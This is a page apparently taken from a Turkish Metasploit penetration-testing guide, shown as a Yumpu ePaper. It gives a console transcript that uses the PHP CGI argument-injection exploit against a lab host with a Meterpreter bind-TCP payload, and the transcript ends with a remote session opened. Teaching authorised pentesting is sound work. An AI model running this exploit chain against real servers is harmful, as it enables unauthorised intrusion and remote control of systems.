30.11.2012 Views

Metasploit framework-Kullanim rehberi 0.8

Metasploit framework-Kullanim rehberi 0.8

Metasploit framework-Kullanim rehberi 0.8

SHOW MORE
SHOW LESS

You also want an ePaper? Increase the reach of your titles

YUMPU automatically turns print PDFs into web optimized ePapers that Google loves.

<strong>Metasploit</strong> Framework ile Sistem Sızma Testleri Aralık 2012<br />

msf exploit(php_cgi_arg_injection) > set RHOST 192.168.1.31<br />

RHOST => 192.168.1.31<br />

msf exploit(php_cgi_arg_injection) > set PAYLOAD php/meterpreter/bind_tcp<br />

PAYLOAD => php/meterpreter/bind_tcp<br />

msf exploit(php_cgi_arg_injection) > show options<br />

Module options (exploit/multi/http/php_cgi_arg_injection):<br />

Name Current Setting Required Description<br />

---- --------------- -------- -----------<br />

Proxies no Use a proxy chain<br />

RHOST 192.168.1.31 yes The target address<br />

RPORT 80 yes The target port<br />

TARGETURI no The URI to request (must be a CGI-handled PHP<br />

script)<br />

URIENCODING 0 yes Level of URI URIENCODING and padding (0 for<br />

minimum)<br />

VHOST no HTTP server virtual host<br />

Payload options (php/meterpreter/bind_tcp):<br />

Name Current Setting Required Description<br />

---- --------------- -------- -----------<br />

LPORT 4444 yes The listen port<br />

RHOST 192.168.1.31 no The target address<br />

Exploit target:<br />

Id Name<br />

-- ----<br />

0 Automatic<br />

msf exploit(php_cgi_arg_injection) > exploit<br />

[*] Started bind handler<br />

[*] Sending stage (39217 bytes) to 192.168.1.31<br />

[*] Meterpreter session 2 opened (192.168.1.11:57290 -> 192.168.1.31:4444) at 2012-09-14<br />

09:57:46 +0300<br />

meterpreter > help<br />

Core Commands<br />

=============<br />

Command Description<br />

------- -----------<br />

? Help menu<br />

background Backgrounds the current session<br />

GamaSEC Bilgi Güvenliği Denetim ve Danışmanlık Servisleri Sayfa 88

Hooray! Your file is uploaded and ready to be published.

Saved successfully!

Ooh no, something went wrong!